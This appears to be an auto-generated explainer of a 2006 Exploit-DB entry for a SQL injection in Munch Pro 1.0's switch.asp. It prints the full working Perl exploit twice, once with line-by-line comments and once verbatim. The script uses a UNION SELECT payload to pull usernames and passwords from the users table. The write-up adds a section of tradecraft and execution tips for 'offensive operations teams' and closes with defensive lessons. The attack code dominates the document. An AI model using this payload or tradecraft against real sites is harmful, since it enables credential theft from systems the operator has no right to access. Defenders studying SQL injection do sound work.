Munch Pro 1.0 'switch.asp' SQL Injection Exploit Explained

What this paper is

This paper details a remote SQL injection vulnerability in Munch Pro version 1.0, specifically within the switch.asp file. The exploit, coded by ajann, leverages this vulnerability to extract username and password information from the application's user database. It's presented as a Perl script that automates the exploitation process.

Simple technical breakdown

The core of the vulnerability lies in how the switch.asp page handles user input, specifically the catid parameter. When this parameter is not properly sanitized, an attacker can inject SQL commands. This exploit uses a technique called "UNION-based SQL injection."

Here's how it works:

Injecting SQL: The attacker crafts a special URL that includes SQL code within the catid parameter.
UNION SELECT: The injected SQL uses UNION SELECT to combine the results of the original, legitimate query with the results of a malicious query.
Data Extraction: The malicious query is designed to select username and password from the users table, filtered by a specific id.
Response Parsing: The exploit script then parses the web server's response to find the extracted username and password, which are displayed in the HTML output.

Complete code and payload walkthrough

The provided Perl script automates the process of sending the crafted SQL injection request and parsing the response.

#!/usr/bin/perl
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(

use IO::Socket; # Imports the IO::Socket module for network communication.
if(@ARGV < 3){ # Checks if fewer than 3 command-line arguments are provided.
print "
[========================================================================
[//    Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
[//           Usage: exploit.pl [target] [path] [userid]
[//                   Example: exploit.pl victim.com / 1
[//                   Example: exploit.pl victim.com /path/ 1
[//                           Vuln&Exp : ajann
[========================================================================
"; # Prints usage instructions if arguments are insufficient.
exit(); # Exits the script.
}
#Local variables
$server = $ARGV[0]; # Assigns the first command-line argument (target hostname) to $server.
$server =~ s/(http:\/\/)//eg; # Removes "http://" from the server string if present.
$host = "http://".$server; # Constructs the full HTTP host URL.
$port = "80"; # Sets the default HTTP port to 80.
$dir = $ARGV[1]; # Assigns the second argument (path) to $dir.
$file = "switch.asp?pg=subMenu&catid="; # Defines the vulnerable file and parameters.
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2]; # Constructs the SQL injection payload.
# Breakdown of $target:
# - "-1": This is a common technique to ensure the original query (which likely expects a positive ID) fails,
#         making the UNION SELECT part more likely to be executed and its results displayed.
# - "%20": URL-encoded space.
# - "union%20select%200,0,username,0,password,0": This is the core of the SQL injection.
#   - "union select": Combines the results of two SELECT statements.
#   - "0,0,username,0,password,0": These are placeholder values. The number of columns in the injected SELECT
#                                   statement must match the number of columns in the original query that
#                                   'switch.asp' would normally execute for 'catid'. The exploit assumes
#                                   the original query returns at least 6 columns, and it's injecting
#                                   'username' into the 3rd column and 'password' into the 5th column.
#                                   The '0's are there to fill the other column slots.
# - "%20from%20users": Specifies the table to query, 'users'.
# - "%20where%20id%20like%20": The WHERE clause to filter the results. 'like' is used here, which can sometimes
#                              be more flexible than '='.
# - $ARGV[2]: The third command-line argument, which is the user ID to search for. The exploit expects this
#             to be a number that will be used in the 'like' comparison.

$target = $host.$dir.$file.$target; # Appends the constructed payload to the base URL.

#Writing data to socket
print "+**********************************************************************+\n"; # Prints a separator.
print "+ Trying to connect: $server\n"; # Informs the user about the connection attempt.
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; # Creates a new TCP socket connection to the target server and port. If it fails, it prints an error and exits.
print $socket "GET $target\n"; # Sends the HTTP GET request with the crafted URL to the server.
print $socket "Host: $server\n"; # Sends the Host header, which is required for virtual hosting.
print $socket "Accept: */*\n"; # Sends the Accept header, indicating the client can accept any content type.
print $socket "Connection: close\n\n"; # Sends the Connection: close header, telling the server to close the connection after the response. The double newline signifies the end of the HTTP headers.
print "+ Connected!...\n"; # Informs the user that the connection was established.
#Getting
while($answer = <$socket>) { # Reads the response from the socket line by line.
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){ # This regex attempts to capture the username.
# - "74%\"": This part likely matches a specific HTML structure or attribute value that appears in the
#             vulnerable application's output when the SQL injection is successful and the username is displayed.
#             The "74%" might be part of a style or a specific element's value.
# - "\"><font color=\"#000000\"><strong>": Matches the HTML tags surrounding the username.
# - "(.*?)": This is a non-greedy capture group. It captures any character (except newline) zero or more times.
#            This is intended to capture the actual username.
# - "<\/strong><br>": Matches the closing HTML tags.
print "+ Exploit succeed! Getting admin information.\n"; # Indicates successful exploitation.
print "+ ---------------- +\n"; # Prints a separator.
print "+ Username: $1\n"; # Prints the captured username (from the first capture group $1).
}

if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){ # This regex attempts to capture the password.
# - "17%\" align=\"center\"><Font Color=\"#000000\"><strong>": Matches HTML structure around the password.
#   Similar to the username regex, "17%" is likely a specific marker in the HTML output.
# - "(.*?)": Captures the password non-greedily.
# - "<\/Font><\/TD>": Matches closing HTML tags.
print "+ Password: $1\n"; # Prints the captured password (from the first capture group $1).
exit(); # Exits the script after successfully retrieving both username and password.
}

if ($answer =~ /Under Construction, Please check back soon.../) { # Checks if the response contains a specific "Under Construction" message.
print "+ Exploit Failed : ( \n"; # Indicates the exploit failed, possibly due to the page being under maintenance.
print "+**********************************************************************+\n"; # Prints a separator.
exit(); # Exits the script.
}

if ($answer =~ /Internal Server Error/) { # Checks if the response indicates an Internal Server Error.
print "+ Exploit Failed : (  \n"; # Indicates the exploit failed, likely due to the injected SQL causing a server-side error.
print "+**********************************************************************+\n"; # Prints a separator.
exit(); # Exits the script.
}

 }
   
    
print "+ Exploit failed :(\n"; # A fallback message if the loop finishes without finding any of the success or failure patterns.
print "+**********************************************************************+\n"; # Prints a separator.

# milw0rm.com [2006-11-12]

Mapping list:

#!/usr/bin/perl: Shebang line, specifies the interpreter.
use IO::Socket;: Imports network socket functionality.
if(@ARGV < 3){ ... exit(); }: Argument validation and usage display.
$server = $ARGV[0]; $server =~ s/(http:\/\/)//eg; $host = "http://".$server;: Target server variable setup.
$port = "80";: Default port.
$dir = $ARGV[1];: Target directory/path.
$file = "switch.asp?pg=subMenu&catid=";: Vulnerable endpoint and parameters.
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];: The core SQL injection payload.
- -1: Ensures original query fails, promoting UNION execution.
- union%20select%200,0,username,0,password,0: Injects SQL to select username and password, assuming 6 columns in the original query.
- from%20users: Specifies the target table.
- where%20id%20like%20: Filters by user ID.
- $ARGV[2]: The user ID to query.
$target = $host.$dir.$file.$target;: Constructs the full URL.
$socket = IO::Socket::INET->new(...) || die ...: Establishes the TCP connection.
print $socket "GET $target\n"; print $socket "Host: $server\n"; ...: Sends the HTTP GET request.
while($answer = <$socket>) { ... }: Reads and processes the server's response.
if ($answer =~ /74%\">(.*?)<\/strong> /){ ... print "+ Username: $1\n"; }: Parses for and prints the username.
if ($answer =~ /17%\" align=\"center\">(.*?)<\/strong><\/Font><\/TD>/){ ... print "+ Password: $1\n"; exit(); }: Parses for and prints the password, then exits.
if ($answer =~ /Under Construction, Please check back soon.../) { ... exit(); }: Handles a specific failure condition.
if ($answer =~ /Internal Server Error/) { ... exit(); }: Handles another failure condition.
print "+ Exploit failed :(\n";: Fallback failure message.

Practical details for offensive operations teams

Required Access Level: Network access to the target web server is required. No prior authentication or local access is needed.
Lab Preconditions:
- A target environment running Munch Pro 1.0 with the vulnerable switch.asp file accessible.
- The web server must be configured to respond to HTTP requests on port 80.
- The users table must exist and contain username and password columns.
- The id column in the users table must be queryable using the LIKE operator with the provided user ID.
- The application's HTML output must contain the specific patterns (74%\"... and 17%\"...) that the exploit script uses for parsing.
Tooling Assumptions:
- Perl interpreter installed on the operator's machine.
- Basic network connectivity.
Execution Pitfalls:
- Incorrect catid column count: The exploit assumes the original query for catid returns exactly 6 columns. If it returns more or fewer, the UNION SELECT will fail, or the data will be misaligned. The regex patterns might also fail if the HTML structure differs.
- Web Application Firewall (WAF): Modern WAFs would likely detect and block the SQL injection payload.
- URL Encoding: While the exploit uses %20 for spaces, other characters in the payload might need encoding depending on the web server or application.
- Application State: If the application is "Under Construction" or returns an "Internal Server Error" for legitimate requests, the exploit might fail or be misinterpreted.
- ID not found: If the provided userid does not exist in the users table, the exploit will likely fail to extract data.
- Output Formatting Changes: The regex patterns are brittle and rely on specific HTML output. Any changes to the application's frontend rendering could break the parsing.
- Port: The exploit hardcodes port 80. If the application runs on a different port, it will fail.
Tradecraft Considerations:
- Reconnaissance: Thoroughly identify the target application version and specific vulnerable files/parameters. Understand the application's normal behavior and expected responses.
- Payload Crafting: If the default payload fails, operators may need to adjust the number of columns in the UNION SELECT statement and the positions of username and password based on error messages or educated guesses about the original query structure.
- Stealth: This exploit is noisy. The GET request is clear, and the response parsing is specific. It's unlikely to be stealthy against a monitored environment.
- Post-Exploitation: The exploit only retrieves credentials. Further steps would be needed to gain deeper access.

Where this was used and when

This exploit targets Munch Pro version 1.0. Munch Pro was a content management system (CMS) or similar web application. The exploit was published on November 12, 2006, by ajann on milw0rm.com. This indicates the vulnerability was active and exploitable around 2006. Such vulnerabilities are typically found in older, unpatched web applications that have not been updated or secured.

Defensive lessons for modern teams

Input Validation and Sanitization: This is paramount. Never trust user input. All data submitted via web forms, URL parameters, or cookies must be validated for expected format and length, and then properly sanitized (e.g., escaping special characters) before being used in database queries.
Parameterized Queries (Prepared Statements): Use parameterized queries or prepared statements for all database interactions. This separates the SQL code from the data, preventing malicious input from being interpreted as SQL commands.
Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns like SQL injection. Keep WAF rules updated.
Regular Patching and Updates: Keep all web applications, frameworks, and server software up-to-date with the latest security patches. This exploit targets a specific, old version.
Least Privilege: Ensure database accounts used by web applications have only the necessary permissions. Avoid using administrative accounts for routine operations.
Error Handling: Configure web applications to display generic error messages to users. Detailed error messages (like SQL errors) can reveal sensitive information to attackers. Log detailed errors server-side for debugging.
Code Auditing: Regularly audit application code for potential vulnerabilities, especially in areas that handle user input and database interactions.
Security Awareness Training: Educate developers on secure coding practices to prevent vulnerabilities like SQL injection from being introduced in the first place.

ASCII visual (if applicable)

+-----------------+     +-----------------+     +-----------------+
| Operator's      | --> | Target Web      | --> | Target Database |
| Machine         |     | Server (Munch   |     | (e.g., MySQL)   |
| (Perl Script)   |     | Pro 1.0)        |     |                 |
+-----------------+     +-----------------+     +-----------------+
        ^                      |
        | HTTP GET Request     | SQL Injection Payload
        | (Crafted URL)        | (in catid parameter)
        |                      |
        +----------------------+
        | HTTP Response        |
        | (HTML with data)     |
        +----------------------+

This diagram illustrates the flow: the operator's machine sends an HTTP GET request to the target web server. The web server, running Munch Pro 1.0, processes the request. The switch.asp script, due to the SQL injection in the catid parameter, executes a modified query against the target database. The database returns data, which is then embedded in the HTML response sent back to the operator's machine. The Perl script parses this response to extract the username and password.

Source references

PAPER ID: 2761
PAPER TITLE: Munch Pro 1.0 - 'switch.asp' SQL Injection
AUTHOR: ajann
PUBLISHED: 2006-11-12
PAPER URL: https://www.exploit-db.com/papers/2761
RAW URL: https://www.exploit-db.com/raw/2761

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(

use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[//    Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
[//           Usage: exploit.pl [target] [path] [userid]
[//                   Example: exploit.pl victim.com / 1
[//                   Example: exploit.pl victim.com /path/ 1
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "switch.asp?pg=subMenu&catid=";
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){ 
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){ 
print "+ Password: $1\n";
exit();
}

if ($answer =~ /Under Construction, Please check back soon.../) { 
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print "+**********************************************************************+\n";
exit(); 
}
 }
   
    
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";

# milw0rm.com [2006-11-12]

By exploitdb papers bot•November 12, 2006•

papers